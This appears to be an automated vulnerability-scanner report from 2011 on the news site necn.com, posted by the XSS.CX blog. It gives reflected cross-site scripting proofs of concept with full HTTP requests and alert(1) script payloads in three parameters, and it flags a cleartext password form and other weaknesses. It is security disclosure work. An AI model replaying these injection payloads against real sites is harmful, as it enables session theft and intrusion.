XSS, necn.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Research Blog at Fri Mar 11 06:57:05 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.necn.com/ [class_evenrow parameter]

1.2. http://www.necn.com/ [class_oddrow parameter]

1.3. http://www.necn.com/common/js/aggregate.js [s parameter]

2. Cleartext submission of password

3. Cookie without HttpOnly flag set

4. Password field with autocomplete enabled

5. Cross-domain script include

5.1. http://www.necn.com/

5.2. http://www.necn.com/common/FB/xd_receiver.htm

6. Email addresses disclosed

7. HTML does not specify charset

7.1. http://www.necn.com/

7.2. http://www.necn.com/common/FB/xd_receiver.htm

7.3. http://www.necn.com/common/js/aggregate.js

7.4. http://www.necn.com/common/js/jqueries/jquery.tools.min.js

8. Content type incorrectly stated

8.1. http://www.necn.com/common/js/aggregate.js

8.2. http://www.necn.com/common/js/jqueries/jquery.tools.min.js

8.3. http://www.necn.com/template_images/main_main_1034_background.jpg

8.4. http://www.necn.com/template_images/main_main_1872_background.1291914844.jpg



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.necn.com/ [class_evenrow parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /

Issue detail

The value of the class_evenrow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2996"><script>alert(1)</script>dc978e944ad was submitted in the class_evenrow parameter. This input was echoed as c2996\"><script>alert(1)</script>dc978e944ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST / HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
Origin: http://www.necn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8; __qca=P0-1553828670-1299847997445
Content-Length: 257

data_only=1&obj=tvlist_right_generic_1167&user_function[getListings]=1&element=right_generic_1167&prefsetID=439102&display_style=roll&items=3&duration=6&class_oddrow=scheduleodd&class_evenrow=sched_evenc2996"><script>alert(1)</script>dc978e944ad&module=tv_listing_display&core_app=tv_listing_display&

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 835
Content-Type: text/html
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:58 GMT
Connection: close

<table border='0' class='tvl_table' cellspacing='0' cellpadding='0'><tr class = "scheduleodd"><td class="tvl_time" nowrap="nowrap">7:00 am&nbsp;</td><td class="tvl_show"><span class="tvl_listing">The
...[SNIP]...
<tr class = "sched_evenc2996\"><script>alert(1)</script>dc978e944ad">
...[SNIP]...

1.2. http://www.necn.com/ [class_oddrow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /

Issue detail

The value of the class_oddrow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1bb4"><script>alert(1)</script>f512881cb18 was submitted in the class_oddrow parameter. This input was echoed as c1bb4\"><script>alert(1)</script>f512881cb18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST / HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
Origin: http://www.necn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8; __qca=P0-1553828670-1299847997445
Content-Length: 257

data_only=1&obj=tvlist_right_generic_1167&user_function[getListings]=1&element=right_generic_1167&prefsetID=439102&display_style=roll&items=3&duration=6&class_oddrow=scheduleoddc1bb4"><script>alert(1)</script>f512881cb18&class_evenrow=sched_even&module=tv_listing_display&core_app=tv_listing_display&

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:58 GMT
Connection: close
Content-Length: 879

<table border='0' class='tvl_table' cellspacing='0' cellpadding='0'><tr class = "scheduleoddc1bb4\"><script>alert(1)</script>f512881cb18"><td class="tvl_time" nowrap="nowrap">7:00 am&nbsp;</td><td cla
...[SNIP]...

1.3. http://www.necn.com/common/js/aggregate.js [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /common/js/aggregate.js

Issue detail

The value of the s request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 998ea%3balert(1)//2f06f50c960 was submitted in the s parameter. This input was echoed as 998ea;alert(1)//2f06f50c960 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/aggregate.js?s=main|thePlatform/util|thePlatform/swfobject|tv_listing998ea%3balert(1)//2f06f50c960&menz=1 HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:58 GMT
Connection: close
Content-Length: 91199

function bigShowHide(inputString,direction){
   var pairs = inputString.split(",");
   var directions = direction.split(",");
   for (var i=0; i<pairs.length; i++){
       if(directions[i]){
           direction = direc
...[SNIP]...
</b>: include(/export/home/common/js/tv_listing998ea;alert(1)//2f06f50c960.js) [<a href='function.include'>
...[SNIP]...

2. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.necn.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET / HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=2a02820e026de694b113032169f8e7dd; path=/
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:50 GMT
Connection: close
Content-Length: 98185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='-1'></td>
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.necn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=2a02820e026de694b113032169f8e7dd; path=/
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:50 GMT
Connection: close
Content-Length: 98185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...

4. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.necn.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET / HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=2a02820e026de694b113032169f8e7dd; path=/
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:50 GMT
Connection: close
Content-Length: 98185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='-1'></td>
...[SNIP]...

5. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.necn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.necn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=2a02820e026de694b113032169f8e7dd; path=/
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:50 GMT
Connection: close
Content-Length: 98185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<META name="keywords" content = "Boston news weather sports business New England video politics">
<script language="javascript" src="http://wac.24C5.edgecastcdn.net/8024C5/platform/common/js/jquery-1.4.2.min.js" type="text/javascript" language="javascript1.2"></script>
...[SNIP]...
ionmini6~component_morningshowsubmit~component_morningshowpromo~component_latest_news_right~component_right_generic~component_footer/g=style~tv_listing/cscc=csnnat" rel="stylesheet" type="text/css" />
<script language="javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript" language="javascript1.2"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/necn/home;tile=1;sz=728x90;ord=1299847688?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/necn/home;tile=2;sz=184x90;ord=1299847688?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/necn/home;tile=4;sz=300x250;ord=1299847690?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/necn/home;tile=5;sz=300x250;ord=1299847690?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/necn/home;tile=6;sz=300x250;ord=1299847690?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/necn/home;tile=7;sz=728x90;ord=1299847690?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/necn/home;tile=3;sz=60x33;ord=1299847690?" type="text/javascript">
</script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js"
type="text/javascript">

</script>
...[SNIP]...

5.2. http://www.necn.com/common/FB/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.necn.com
Path:   /common/FB/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /common/FB/xd_receiver.htm HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f3d0c9aae18d61759935603c209147ae&extern=0&channel=http%3A%2F%2Fwww.necn.com%2Fcommon%2FFB%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8; __qca=P0-1553828670-1299847997445; __utma=92360066.1817728880.1299848000.1299848000.1299848000.1; __utmb=92360066; __utmc=92360066; __utmz=92360066.1299848000.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 360
Content-Type: text/html
ETag: "1a9dd54e-168-27b41600"
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain Receiver Page<
...[SNIP]...
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js?2" type="text/javascript"></script>
...[SNIP]...

6. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.necn.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET / HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=2a02820e026de694b113032169f8e7dd; path=/
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:50 GMT
Connection: close
Content-Length: 98185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<a href="mailto: helpmebrian@necn.com">
...[SNIP]...
<a href="mailto:jakethevet@necn.com">
...[SNIP]...
<a href=mailto:tedalditreatment@necn.com">
...[SNIP]...

7. HTML does not specify charset  previous  next
There are 4 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


7.1. http://www.necn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.necn.com
Path:   /

Request

POST / HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
Origin: http://www.necn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8; __qca=P0-1553828670-1299847997445
Content-Length: 257

data_only=1&obj=tvlist_right_generic_1167&user_function[getListings]=1&element=right_generic_1167&prefsetID=439102&display_style=roll&items=3&duration=6&class_oddrow=scheduleodd&class_evenrow=sched_ev
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 791
Content-Type: text/html
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:54 GMT
Connection: close

<table border='0' class='tvl_table' cellspacing='0' cellpadding='0'><tr class = "scheduleodd"><td class="tvl_time" nowrap="nowrap">7:00 am&nbsp;</td><td class="tvl_show"><span class="tvl_listing">The
...[SNIP]...

7.2. http://www.necn.com/common/FB/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.necn.com
Path:   /common/FB/xd_receiver.htm

Request

GET /common/FB/xd_receiver.htm HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f3d0c9aae18d61759935603c209147ae&extern=0&channel=http%3A%2F%2Fwww.necn.com%2Fcommon%2FFB%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8; __qca=P0-1553828670-1299847997445; __utma=92360066.1817728880.1299848000.1299848000.1299848000.1; __utmb=92360066; __utmc=92360066; __utmz=92360066.1299848000.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 360
Content-Type: text/html
ETag: "1a9dd54e-168-27b41600"
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain Receiver Page<
...[SNIP]...

7.3. http://www.necn.com/common/js/aggregate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.necn.com
Path:   /common/js/aggregate.js

Request

GET /common/js/aggregate.js?s=main|thePlatform/util|thePlatform/swfobject|tv_listing&menz=1 HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Fri, 11 Mar 2011 12:51:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 11 Mar 2011 12:51:50 GMT
Connection: close
Content-Length: 90989

function bigShowHide(inputString,direction){
   var pairs = inputString.split(",");
   var directions = direction.split(",");
   for (var i=0; i<pairs.length; i++){
       if(directions[i]){
           direction = direc
...[SNIP]...

7.4. http://www.necn.com/common/js/jqueries/jquery.tools.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.necn.com
Path:   /common/js/jqueries/jquery.tools.min.js

Request

GET /common/js/jqueries/jquery.tools.min.js HTTP/1.1
Host: www.necn.com
Proxy-Connection: keep-alive
Referer: http://www.necn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5db8d585898b23752022541cd48c0bd8

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=7341
Date: Fri, 11 Mar 2011 12:51:52 GMT
Connection: close
Content-Length: 19779

/*
* jQuery Tools 1.2.3 - The missing UI library for the Web
*
* [tabs, tabs.slideshow, tooltip, tooltip.slide, tooltip.dynamic, scrollable, scrollable.autoscroll, scrollable.navigator, overlay, o
...[SNIP]...

8. Content type incorrectly stated  previous
There are 4 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


8.1. http://www.necn.com/common/js/aggregate.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.necn.com
Path:   /common/js/aggregate.js

Issue detail

